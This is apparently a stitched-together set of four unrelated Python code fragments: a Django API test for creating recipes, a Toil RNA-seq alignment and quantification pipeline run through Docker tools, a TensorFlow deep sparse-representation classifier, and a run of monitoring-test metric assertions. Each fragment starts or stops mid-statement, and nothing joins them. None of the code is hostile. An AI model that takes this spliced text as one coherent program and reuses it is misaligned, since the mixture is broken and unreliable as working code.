self.jt1.version, 'job_type_revision': 1}}, 'node_b': {'dependencies': [{'name': 'node_a'}], 'input': {'INPUT_IMAGE': {'type': 'dependency', 'node': 'node_a', 'output': 'OUTPUT_IMAGE'}}, 'node_type': {'node_type': 'job', 'job_type_name': self.jt2.name, 'job_type_version': self.jt2.version, 'job_type_revision': 1}} } } self.recipe_type = recipe_test_utils.create_recipe_type_v6(definition=self.def_v6_dict) self.inactive_recipe_type = recipe_test_utils.create_recipe_type_v6(definition=self.def_v6_dict, is_active=False) @patch('queue.models.CommandMessageManager') @patch('queue.models.create_process_recipe_input_messages') def test_successful_v1data(self, mock_create, mock_msg_mgr): data_dict = { 'version': '1.0', 'input_data': [{ 'name': 'INPUT_IMAGE', 'file_id': self.source_file.id, }], 'output_data': [{ 'name': 'output_a', 'workspace_id': self.workspace.id }] } json_data = { "input" : data_dict, "recipe_type_id" : self.recipe_type.pk } url = '/%s/recipes/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content) #Response should be new v6 recipe detail response result = json.loads(response.content) self.assertTrue('data' not in result) self.assertTrue('/%s/recipes/' % self.api in response['location']) mock_create.assert_called_once() @patch('queue.models.CommandMessageManager') @patch('queue.models.create_process_recipe_input_messages') def test_successful_v6data(self, mock_create, mock_msg_mgr): data = {'version': '6', 'files': {'INPUT_IMAGE': [self.source_file.id]}, 'json':
the rest of the pipelines ids: dict Dictionary of fileStore IDS input_args: dict Dictionary of input arguments sample: tuple Contains uuid and sample_url """ if len(sample) == 2: uuid, sample_location = sample url1, url2 = None, None else: uuid, url1, url2 = sample sample_location = None # Update values unique to sample sample_input = dict(input_args) sample_input['uuid'] = uuid sample_input['sample.tar'] = sample_location if sample_input['output_dir']: sample_input['output_dir'] = os.path.join(input_args['output_dir'], uuid) sample_input['cpu_count'] = multiprocessing.cpu_count() job_vars = (sample_input, ids) # Download or locate local file and place in the jobStore if sample_input['input']: ids['sample.tar'] = job.fileStore.writeGlobalFile(os.path.abspath(sample_location)) elif sample_input['config_fastq']: ids['R1.fastq'] = job.fileStore.writeGlobalFile(urlparse(url1).path) ids['R2.fastq'] = job.fileStore.writeGlobalFile(urlparse(url2).path) else: if sample_input['ssec']: ids['sample.tar'] = job.addChildJobFn(download_encrypted_file, sample_input, 'sample.tar', disk='25G').rv() else: ids['sample.tar'] = job.addChildJobFn(download_from_url, sample_input['sample.tar'], disk='25G').rv() job.addFollowOnJobFn(static_dag_launchpoint, job_vars) def static_dag_launchpoint(job, job_vars): """ Statically define jobs in the pipeline job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars if input_args['config_fastq']: cores = input_args['cpu_count'] a = job.wrapJobFn(mapsplice, job_vars, cores=cores, disk='130G').encapsulate() else: a = job.wrapJobFn(merge_fastqs, job_vars, disk='70 G').encapsulate() b = job.wrapJobFn(consolidate_output, job_vars, a.rv()) # Take advantage of "encapsulate" to simplify pipeline wiring job.addChild(a) a.addChild(b) def merge_fastqs(job, job_vars): """ Unzips input sample and concats the Read1 and Read2 groups together. job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cores = input_args['cpu_count'] single_end_reads = input_args['single_end_reads'] # I/O sample = return_input_paths(job, work_dir, ids, 'sample.tar') # Untar File # subprocess.check_call(['unzip', sample, '-d', work_dir]) subprocess.check_call(['tar', '-xvf', sample, '-C', work_dir]) # Remove large files before creating concat versions. os.remove(os.path.join(work_dir, 'sample.tar')) # Zcat files in parallel if single_end_reads: files = sorted(glob.glob(os.path.join(work_dir, '*'))) with open(os.path.join(work_dir, 'R1.fastq'), 'w') as f1: subprocess.check_call(['zcat'] + files, stdout=f1) # FileStore ids['R1.fastq'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'R1.fastq')) else: r1_files = sorted(glob.glob(os.path.join(work_dir, '*R1*'))) r2_files = sorted(glob.glob(os.path.join(work_dir, '*R2*'))) with open(os.path.join(work_dir, 'R1.fastq'), 'w') as f1: p1 = subprocess.Popen(['zcat'] + r1_files, stdout=f1) with open(os.path.join(work_dir, 'R2.fastq'), 'w') as f2: p2 = subprocess.Popen(['zcat'] + r2_files, stdout=f2) p1.wait() p2.wait() # FileStore ids['R1.fastq'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'R1.fastq')) ids['R2.fastq'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'R2.fastq')) job.fileStore.deleteGlobalFile(ids['sample.tar']) # Spawn child job return job.addChildJobFn(mapsplice, job_vars, cores=cores, disk='130 G').rv() def mapsplice(job, job_vars): """ Maps RNA-Seq reads to a reference genome. job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cores = input_args['cpu_count'] sudo = input_args['sudo'] single_end_reads = input_args['single_end_reads'] files_to_delete = ['R1.fastq'] # I/O return_input_paths(job, work_dir, ids, 'ebwt.zip', 'chromosomes.zip') if single_end_reads: return_input_paths(job, work_dir, ids, 'R1.fastq') else: return_input_paths(job, work_dir, ids, 'R1.fastq', 'R2.fastq') files_to_delete.extend(['R2.fastq']) for fname in ['chromosomes.zip', 'ebwt.zip']: subprocess.check_call(['unzip', '-o', os.path.join(work_dir, fname), '-d', work_dir]) # Command and call parameters = ['-p', str(cores), '-s', '25', '--bam', '--min-map-len', '50', '-x', '/data/ebwt', '-c', '/data/chromosomes', '-1', '/data/R1.fastq', '-o', '/data'] if not single_end_reads: parameters.extend(['-2', '/data/R2.fastq']) docker_call(tool='quay.io/ucsc_cgl/mapsplice:2.1.8--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=parameters, work_dir=work_dir, sudo=sudo) # Write to FileStore for fname in ['alignments.bam', 'stats.txt']: ids[fname] = job.fileStore.writeGlobalFile(os.path.join(work_dir, fname)) for fname in files_to_delete: job.fileStore.deleteGlobalFile(ids[fname]) # Run child job # map_id = job.addChildJobFn(mapping_stats, job_vars).rv() if input_args['upload_bam_to_s3'] and input_args['s3_dir']: job.addChildJobFn(upload_bam_to_s3, job_vars) output_ids = job.addChildJobFn(add_read_groups, job_vars, disk='30 G').rv() return output_ids def mapping_stats(job, job_vars): """ This function is not currently in use. job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O return_input_paths(job, work_dir, ids, 'stats.txt') uuid = input_args['uuid'] # Command docker_call(tool='jvivian/mapping_stats', tool_parameters=[uuid], work_dir=work_dir, sudo=sudo) # Zip output files and store output_files = ['{}_stats2.txt'.format(uuid), '{}_stats_all.txt'.format(uuid), '{}_mapping.tab'.format(uuid)] tarball_files(work_dir, tar_name='map.tar.gz', files=output_files) return job.fileStore.writeGlobalFile(os.path.join(work_dir, 'map.tar.gz')) def add_read_groups(job, job_vars): """ This function adds read groups to the headers job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O alignments = return_input_paths(job, work_dir, ids, 'alignments.bam') output = os.path.join(work_dir, 'rg_alignments.bam') # Command and callg parameter = ['AddOrReplaceReadGroups', 'INPUT={}'.format(docker_path(alignments)), 'OUTPUT={}'.format(docker_path(output)), 'RGSM={}'.format(input_args['uuid']), 'RGID={}'.format(input_args['uuid']), 'RGLB=TruSeq', 'RGPL=illumina', 'RGPU=barcode', 'VALIDATION_STRINGENCY=SILENT'] docker_call(tool='quay.io/ucsc_cgl/picardtools:1.95--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=parameter, work_dir=work_dir, sudo=sudo) # Write to FileStore ids['rg_alignments.bam'] = job.fileStore.writeGlobalFile(output) # Run child job return job.addChildJobFn(bamsort_and_index, job_vars, disk='30 G').rv() def bamsort_and_index(job, job_vars): """ Sorts bam file and produces index file job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O rg_alignments = return_input_paths(job, work_dir, ids, 'rg_alignments.bam') output = os.path.join(work_dir, 'sorted.bam') # Command -- second argument is "Output Prefix" cmd1 = ['sort', docker_path(rg_alignments), docker_path('sorted')] cmd2 = ['index', docker_path(output)] docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd1, work_dir=work_dir, sudo=sudo) docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd2, work_dir=work_dir, sudo=sudo) # Write to FileStore ids['sorted.bam'] = job.fileStore.writeGlobalFile(output) ids['sorted.bam.bai'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'sorted.bam.bai')) # Run child job output_ids = job.addChildJobFn(sort_bam_by_reference, job_vars, disk='50 G').rv() rseq_id = job.addChildJobFn(rseq_qc, job_vars, disk='20 G').rv() return rseq_id, output_ids def rseq_qc(job, job_vars): """ QC module: contains QC metrics and information about the BAM post alignment job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() uuid = input_args['uuid'] sudo = input_args['sudo'] # I/O return_input_paths(job, work_dir, ids, 'sorted.bam', 'sorted.bam.bai') # Command docker_call(tool='jvivian/qc', tool_parameters=['/opt/cgl-docker-lib/RseqQC_v2.sh', '/data/sorted.bam', uuid], work_dir=work_dir, sudo=sudo) # Write to FileStore output_files = [f for f in glob.glob(os.path.join(work_dir, '*')) if 'sorted.bam' not in f] tarball_files(work_dir, tar_name='qc.tar.gz', uuid=None, files=output_files) return job.fileStore.writeGlobalFile(os.path.join(work_dir, 'qc.tar.gz')) def sort_bam_by_reference(job, job_vars): """ Sorts the bam by reference job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() # I/O sorted_bam, sorted_bai = return_input_paths(job, work_dir, ids, 'sorted.bam', 'sorted.bam.bai') output = os.path.join(work_dir, 'sort_by_ref.bam') # Call: Samtools ref_seqs = [] handle = subprocess.Popen(["samtools", "view", "-H", sorted_bam], stdout=subprocess.PIPE).stdout for line in handle: if line.startswith("@SQ"): tmp = line.split("\t") chrom = tmp[1].split(":")[1] ref_seqs.append(chrom) handle.close() # Iterate through chromosomes to create mini-bams for chrom in ref_seqs: # job.addChildJobFn(sbbr_child, chrom, os.path.join(work_dir, chrom), sorted_bam) cmd_view = ["samtools", "view", "-b", sorted_bam, chrom] cmd_sort = ["samtools", "sort", "-m", "3000000000", "-n", "-", os.path.join(work_dir, chrom)] p1 = subprocess.Popen(cmd_view, stdout=subprocess.PIPE) subprocess.check_call(cmd_sort, stdin=p1.stdout) sorted_files = [os.path.join(work_dir, chrom) + '.bam' for chrom in ref_seqs] cmd = ["samtools", "cat", "-o", output] + sorted_files subprocess.check_call(cmd) # Write to FileStore ids['sort_by_ref.bam'] = job.fileStore.writeGlobalFile(output) rsem_id = job.addChildJobFn(transcriptome, job_vars, disk='30 G', memory='30 G').rv() exon_id = job.addChildJobFn(exon_count, job_vars, disk='30 G').rv() return exon_id, rsem_id def exon_count(job, job_vars): """ Produces exon counts job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() uuid = input_args['uuid'] sudo = input_args['sudo'] # I/O sort_by_ref, normalize_pl, composite_bed = return_input_paths(job, work_dir, ids, 'sort_by_ref.bam', 'normalize.pl', 'composite_exons.bed') # Command tool = 'jvivian/bedtools' cmd_1 = ['coverage', '-split', '-abam', docker_path(sort_by_ref), '-b', docker_path(composite_bed)] cmd_2 = ['perl', os.path.join(work_dir, 'normalize.pl'), sort_by_ref, composite_bed] popen_docker = ['docker', 'run', '-v', '{}:/data'.format(work_dir), tool] if sudo: popen_docker = ['sudo'] + popen_docker p = subprocess.Popen(popen_docker + cmd_1, stdout=subprocess.PIPE) with open(os.path.join(work_dir, 'exon_quant'), 'w') as f: subprocess.check_call(cmd_2, stdin=p.stdout, stdout=f) p1 = subprocess.Popen(['cat', os.path.join(work_dir, 'exon_quant')], stdout=subprocess.PIPE) p2 = subprocess.Popen(['tr', '":"', '"\t"'], stdin=p1.stdout, stdout=subprocess.PIPE) p3 = subprocess.Popen(['tr', '"-"', '"\t"'], stdin=p2.stdout, stdout=subprocess.PIPE) with open(os.path.join(work_dir, 'exon_quant.bed'), 'w') as f: subprocess.check_call(['cut', '-f1-4'], stdin=p3.stdout, stdout=f) # Create zip, upload to fileStore, and move to output_dir as a backup output_files = ['exon_quant.bed', 'exon_quant'] tarball_files(work_dir, tar_name='exon.tar.gz', uuid=uuid, files=output_files) return job.fileStore.writeGlobalFile(os.path.join(work_dir, 'exon.tar.gz')) def transcriptome(job, job_vars): """ Creates a bam of just the transcriptome job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O sort_by_ref, bed, hg19_fa = return_input_paths(job, work_dir, ids, 'sort_by_ref.bam', 'unc.bed', 'hg19.transcripts.fa') output = os.path.join(work_dir, 'transcriptome.bam') # Command parameters = ['sam-xlate', '--bed', docker_path(bed), '--in', docker_path(sort_by_ref), '--order', docker_path(hg19_fa), '--out', docker_path(output), '--xgtag', '--reverse'] docker_call(tool='quay.io/ucsc_cgl/ubu:1.2--02806964cdf74bf5c39411b236b4c4e36d026843', tool_parameters=parameters, work_dir=work_dir, java_opts='-Xmx30g', sudo=sudo) # Write to FileStore ids['transcriptome.bam'] = job.fileStore.writeGlobalFile(output) # Run child job return job.addChildJobFn(filter_bam, job_vars, memory='30G', disk='30G').rv() def filter_bam(job, job_vars): """ Performs filtering on the transcriptome bam job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cores = input_args['cpu_count'] sudo = input_args['sudo'] # I/O transcriptome_bam = return_input_paths(job, work_dir, ids, 'transcriptome.bam') output = os.path.join(work_dir, 'filtered.bam') # Command parameters = ['sam-filter', '--strip-indels', '--max-insert', '1000', '--mapq', '1', '--in', docker_path(transcriptome_bam), '--out', docker_path(output)] docker_call(tool='quay.io/ucsc_cgl/ubu:1.2--02806964cdf74bf5c39411b236b4c4e36d026843', tool_parameters=parameters, work_dir=os.path.dirname(output), java_opts='-Xmx30g', sudo=sudo) # Write to FileStore ids['filtered.bam'] = job.fileStore.writeGlobalFile(output) # Run child job return job.addChildJobFn(rsem, job_vars, cores=cores, disk='30 G').rv() def rsem(job, job_vars): """ Runs RSEM to produce counts job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cpus = input_args['cpu_count'] sudo = input_args['sudo'] single_end_reads = input_args['single_end_reads'] # I/O filtered_bam, rsem_ref = return_input_paths(job, work_dir, ids, 'filtered.bam', 'rsem_ref.zip') subprocess.check_call(['unzip', '-o', os.path.join(work_dir,
<gh_stars>1-10 # Deep Sparse Representation-based Classification # https://arxiv.org/abs/1904.11093 # <NAME> # <EMAIL> # Built upon https://github.com/panji1990/Deep-subspace-clustering-networks # and https://github.com/mahdiabavisani/Deep-multimodal-subspace-clustering-networks # # Citation: <NAME> and <NAME>, "Deep sparse representation-based clas- sification," # IEEE Signal Processing Letters, vol. 26, no. 6, pp. 948-952, June 2019. # DOI:10.1109/LSP.2019.2913022 import tensorflow as tf import numpy as np from tensorflow.contrib import layers import scipy.io as sio import argparse import random class ConvAE(object): def __init__(self, n_input, kernel_size, n_hidden, reg_constant1=1.0, re_constant2=1.0, batch_size=200, train_size=100,reg=None, \ denoise=False, model_path=None, restore_path=None, \ logs_path='./logs'): self.n_input = n_input self.kernel_size = kernel_size self.n_hidden = n_hidden self.batch_size = batch_size self.train_size = train_size self.test_size = batch_size - train_size self.reg = reg self.model_path = model_path self.restore_path = restore_path self.iter = 0 tf.set_random_seed(2019) weights = self._initialize_weights() # input required to be fed self.train = tf.placeholder(tf.float32, [None, self.n_input[0], self.n_input[1], 1]) self.test = tf.placeholder(tf.float32, [None, self.n_input[0], self.n_input[1], 1]) self.learning_rate = tf.placeholder(tf.float32, [],name='learningRate') self.x = tf.concat([self.train, self.test], axis=0) #Concat testing and training samples latent, latents, shape = self.encoder(self.x, weights) latent_shape = tf.shape(latent) # Slice the latent space features to separate training and testing latent features latent_train = tf.slice(latent,[0,0,0,0],[self.train_size, latent_shape[1], latent_shape[2], latent_shape[3]]) latent_test = tf.slice(latent,[self.train_size,0,0,0],[self.test_size, latent_shape[1], latent_shape[2], latent_shape[3]]) # Vectorize the features z_train = tf.reshape(latent_train, [self.train_size, -1]) z_test = tf.reshape(latent_test, [self.test_size, -1]) z = tf.reshape(latent, [self.batch_size, -1]) Coef = weights['Coef'] # This is \theta in the paper z_test_c = tf.matmul(Coef, z_train) z_c = tf.concat([z_train, z_test_c], axis=0) latent_c_test = tf.reshape(z_test_c, tf.shape(latent_test)) latent_c_pretrain = tf.concat([latent_train, latent_test], axis=0) # used in pretraining stage latent_c = tf.concat([latent_train, latent_c_test], axis=0) # used in the main model self.x_r_pretrain = self.decoder(latent_c_pretrain, weights, shape) # used in pretraining stage self.x_r = self.decoder(latent_c, weights, shape) # used in the main model self.Coef_test = Coef self.AE = tf.concat([z_train, z_test], axis=0) # Autoencoder features to be used in benchmarks comparison # l_2 reconstruction loss self.loss_pretrain = tf.reduce_sum(tf.pow(tf.subtract(self.x, self.x_r_pretrain), 2.0)) self.reconst_cost_x = tf.reduce_sum(tf.pow(tf.subtract(self.x, self.x_r), 2.0)) tf.summary.scalar("recons_loss", self.reconst_cost_x) self.reg_losses = tf.reduce_sum(tf.pow(Coef, 2.0)) tf.summary.scalar("reg_loss", reg_constant1 * self.reg_losses) self.selfexpress_losses = 0.5 * tf.reduce_sum(tf.pow(tf.subtract(z_c, z), 2.0)) tf.summary.scalar("selfexpress_loss", re_constant2 * self.selfexpress_losses) # TOTAL LOSS self.loss = self.reconst_cost_x + reg_constant1 * self.reg_losses + 0.5 * re_constant2 * self.selfexpress_losses self.merged_summary_op = tf.summary.merge_all() self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize( self.loss) # GradientDescentOptimizer #AdamOptimizer self.optimizer_pretrain = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize( self.loss_pretrain) # GradientDescentOptimizer #AdamOptimizer self.init = tf.global_variables_initializer() tfconfig = tf.ConfigProto(allow_soft_placement=True) tfconfig.gpu_options.allow_growth = True self.sess = tf.InteractiveSession(config=tfconfig) self.sess.run(self.init) self.saver = tf.train.Saver([v for v in tf.trainable_variables() if not (v.name.startswith("Coef"))]) # to save the pretrained model self.summary_writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph()) def _initialize_weights(self): ''' initializes weights for the model and soters them in a dictionary. ''' all_weights = dict() all_weights['enc_w0'] = tf.get_variable("enc_w0", shape=[self.kernel_size[0], self.kernel_size[0], 1, self.n_hidden[0]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc1_b0'] = tf.Variable(tf.zeros([self.n_hidden[0]], dtype=tf.float32)) all_weights['enc_b0'] = tf.Variable(tf.zeros([self.n_hidden[0]], dtype=tf.float32)) all_weights['enc_w1'] = tf.get_variable("enc_w1", shape=[self.kernel_size[1], self.kernel_size[1], self.n_hidden[0], self.n_hidden[1]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc_b1'] = tf.Variable(tf.zeros([self.n_hidden[1]], dtype=tf.float32)) all_weights['enc_w2'] = tf.get_variable("enc_w2", shape=[self.kernel_size[2], self.kernel_size[2], self.n_hidden[1], self.n_hidden[2]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc_b2'] = tf.Variable(tf.zeros([self.n_hidden[2]], dtype=tf.float32)) all_weights['dec_w0'] = tf.get_variable("dec1_w0", shape=[self.kernel_size[2], self.kernel_size[2], self.n_hidden[1], self.n_hidden[3]], initializer=layers.xavier_initializer_conv2d()) all_weights['dec_b0'] = tf.Variable(tf.zeros([self.n_hidden[1]], dtype=tf.float32)) all_weights['dec_w1'] = tf.get_variable("dec1_w1", shape=[self.kernel_size[1], self.kernel_size[1], self.n_hidden[0], self.n_hidden[1]], initializer=layers.xavier_initializer_conv2d()) all_weights['dec_b1'] = tf.Variable(tf.zeros([self.n_hidden[0]], dtype=tf.float32)) all_weights['dec_w2'] = tf.get_variable("dec1_w2", shape=[self.kernel_size[0], self.kernel_size[0], 1, self.n_hidden[0]], initializer=layers.xavier_initializer_conv2d()) all_weights['dec_b2'] = tf.Variable(tf.zeros([1], dtype=tf.float32)) all_weights['enc_w3'] = tf.get_variable("enc_w3", shape=[self.kernel_size[3], self.kernel_size[3], self.n_hidden[2], self.n_hidden[3]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc_b3'] = tf.Variable(tf.zeros([self.n_hidden[3]], dtype=tf.float32)) all_weights['Coef'] = tf.Variable(1.0e-4 * tf.ones([self.test_size, self.train_size], tf.float32), name='Coef') return all_weights # Building the encoder def encoder(self, X, weights): shapes = [] # Encoder Hidden layer with relu activation #1 shapes.append(X.get_shape().as_list()) layer1 = tf.nn.bias_add( tf.nn.conv2d(X, weights['enc_w0'], strides=[1, 2, 2, 1], padding='SAME'), weights['enc_b0']) layer1 = tf.nn.relu(layer1) layer2 = tf.nn.bias_add( tf.nn.conv2d(layer1, weights['enc_w1'], strides=[1, 1, 1, 1], padding='SAME'), weights['enc_b1']) layer2 = tf.nn.relu(layer2) layer3 = tf.nn.bias_add( tf.nn.conv2d(layer2, weights['enc_w2'], strides=[1, 2, 2, 1], padding='SAME'), weights['enc_b2']) layer3 = tf.nn.relu(layer3) latents = layer3 print(layer3.shape) shapes.append(layer1.get_shape().as_list()) shapes.append(layer2.get_shape().as_list()) layer3_in = layer3 latent = tf.nn.conv2d(layer3_in, weights['enc_w3'], strides=[1, 1, 1, 1], padding='SAME') latent = tf.nn.relu(latent) shapes.append(latent.get_shape().as_list()) return latent, latents, shapes # Building the decoder def decoder(self, z, weights, shapes): # Encoder Hidden layer with relu activation #1 shape_de1 = shapes[2] layer1 = tf.add(tf.nn.conv2d_transpose(z, weights['dec_w0'], tf.stack( [tf.shape(self.x)[0], shape_de1[1], shape_de1[2], shape_de1[3]]), \ strides=[1, 2, 2, 1], padding='SAME'), weights['dec_b0']) layer1 = tf.nn.relu(layer1) shape_de2 = shapes[1] layer2 = tf.add(tf.nn.conv2d_transpose(layer1, weights['dec_w1'], tf.stack( [tf.shape(self.x)[0], shape_de2[1], shape_de2[2], shape_de2[3]]), \ strides=[1, 1, 1, 1], padding='SAME'), weights['dec_b1']) layer2 = tf.nn.relu(layer2) shape_de3 = shapes[0] layer3 = tf.add(tf.nn.conv2d_transpose(layer2, weights['dec_w2'], tf.stack( [tf.shape(self.x)[0], shape_de3[1], shape_de3[2], shape_de3[3]]), \ strides=[1, 2, 2, 1], padding='SAME'), weights['dec_b2']) layer3 = tf.nn.relu(layer3) recons = layer3 return recons def partial_fit(self, X,Y, lr): cost, summary, _, Coef = self.sess.run( (self.reconst_cost_x, self.merged_summary_op, self.optimizer, self.Coef_test), feed_dict={self.learning_rate:lr,self.train:Y,self.test:X}) self.summary_writer.add_summary(summary, self.iter) self.iter = self.iter + 1 return cost, Coef def pretrain_step(self, X,Y, lr): cost, summary, _ = self.sess.run( (self.reconst_cost_x, self.merged_summary_op, self.optimizer_pretrain), feed_dict={self.learning_rate:lr,self.train:Y,self.test:X}) self.summary_writer.add_summary(summary, self.iter) self.iter = self.iter + 1 return cost def initlization(self): self.sess.run(self.init) def reconstruct(self, X): return self.sess.run(self.x_r, feed_dict={self.x:X}) def transform(self, X,Y): return self.sess.run(self.AE, feed_dict={self.train:Y,self.test:X}) def save_model(self): save_path = self.saver.save(self.sess, self.model_path) print ("model saved in file: %s" % save_path) def restore(self): self.saver.restore(self.sess, self.restore_path) print ("model restored") def thrC(C, ro=0.1): if ro < 1: N1 = C.shape[0] N2 = C.shape[1] Cp = np.zeros((N1, N2)) S = np.abs(np.sort(-np.abs(C), axis=0)) Ind = np.argsort(-np.abs(C), axis=0) for i in range(N2): cL1 = np.sum(S[:, i]).astype(float) stop = False csum = 0 t = 0 while (stop == False): csum = csum + S[t, i] if csum > ro * cL1: stop = True Cp[Ind[0:t + 1, i], i] = C[Ind[0:t + 1, i], i] t = t + 1 else: Cp = C return Cp def err_rate(gt_s, s): err_x = np.sum(gt_s[:] != s[:]) missrate = err_x.astype(float) / (gt_s.shape[0]) return missrate def testing(Img_test,Img_train, train_labels,test_labels, CAE, num_class,args): Img_test = np.array(Img_test) Img_test = Img_test.astype(float) Img_train = np.array(Img_train) Img_train = Img_train.astype(float) train_labels = np.array(train_labels[:]) train_labels = train_labels - train_labels.min() + 1 train_labels = np.squeeze(train_labels) test_labels = np.array(test_labels[:]) test_labels = test_labels - test_labels.min() + 1 test_labels = np.squeeze(test_labels) #Img_test=np.hstack((Img_test,Img_train)) #test_labels=np. #print(train_labels.shape) #print(test_labels.shape) #Img_test=np.vstack((Img_test,Img_train)) #test_labels=np.vstack((test_labels,train_labels)) #print(aaa.shape) CAE.initlization() max_step = args.max_step # 500 + num_class*25# 100+num_class*20 pretrain_max_step = args.pretrain_step display_step = args.display_step #max_step lr = 1.0e-3 epoch = 0 class_ = np.zeros(np.max(test_labels)) prediction = np.zeros(len(test_labels)) ACC =[] Cost=[] while epoch < pretrain_max_step: epoch = epoch + 1 cost = CAE.pretrain_step(Img_test,Img_train, lr) # if epoch % display_step == 0: print ("pretrtain epoch: %.1d" % epoch, "cost: %.8f" % (cost / float(batch_size))) while epoch < max_step: epoch = epoch + 1 cost, Coef = CAE.partial_fit(Img_test,Img_train, lr) # if epoch % display_step == 0: print ("epoch: %.1d" % epoch, "cost: %.8f" % (cost / float(batch_size))) Coef = thrC(Coef) Coef= np.abs(Coef) for test_sample in range(0,len(test_labels)): x = Coef[test_sample,:] for l in range(1,np.max(test_labels)+1): l_idx = np.array([j for j in range(0,len(train_labels)) if train_labels[j]==l]) l_idx= l_idx.astype(int) class_[int(l-1)] = sum(np.abs(x[l_idx])) prediction[test_sample] = np.argmax(class_) +1 prediction = np.array(prediction) missrate_x = err_rate(test_labels, prediction) acc_x = 1 - missrate_x print("accuracy: %.4f" % acc_x) ACC.append(acc_x) Cost.append(cost / float(batch_size)) if False: # change to ture to save values in a mat file sio.savemat('./coef.mat', dict(ACC=ACC,Coef=Coef,Cost=Cost)) return acc_x, Coef def get_train_test_data(data,training_rate=0.8): ''' Extracts features and labels from the dictionary "data," and splits the samples into training and testing sets. Input: data: dictionary containing two keys: {feature, Label} data['features'] : vectorized features (1024 x N) data['Label'] : groundtruth labels (1 x N) rate: ratio of the # of training samples to the total # of samples Output: training and testing sets. ''' Label = data['Label'] Label = np.squeeze(np.array(Label)) training_size = int(training_rate * len(Label)) perm = np.random.permutation(len(Label)) training_idx = perm[:training_size] testing_idx = perm[training_size:] train_labels = Label[training_idx] test_labels = Label[testing_idx] I_test = [] I_train = [] img = data['features'] training_img = img[:,training_idx] testing_img = img[:,testing_idx] for i in range(training_img.shape[1]): temp = np.reshape(training_img[:, i], [32, 32]) I_train.append(temp) Img_train = np.transpose(np.array(I_train), [0, 2, 1]) Img_train = np.expand_dims(Img_train[:], 3) for i in range(testing_img.shape[1]): temp = np.reshape(testing_img[:, i], [32, 32]) I_test.append(temp) Img_test = np.transpose(np.array(I_test), [0, 2, 1]) Img_test = np.expand_dims(Img_test[:], 3) return Img_train,Img_test,train_labels,test_labels,Label if __name__ == '__main__': random.seed(2019) parser = argparse.ArgumentParser(description='') parser.add_argument('--mat', dest='mat', default='umd', help='path of the dataset') parser.add_argument('--model', dest='model', default='umd', help='name of the model to be saved') parser.add_argument('--rate', dest='rate', type=float, default=0.8, help='Pecentage of samples ') parser.add_argument('--epoch', dest='max_step', type=int, default=10000, help='Max # training epochs') parser.add_argument('--pretrain_step', dest='pretrain_step', type=int, default=1000, help='Max # of pretraining epochs ') parser.add_argument('--display_step', dest='display_step', type=int, default=1000, help='frequency of reports')
value=0.0, tags=tags101 + ['port:eth101/1/22'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/23'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/24'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/25'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/26'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/27'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/28'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/29'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/30'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/31'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/32'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/34'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/35'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/36'], 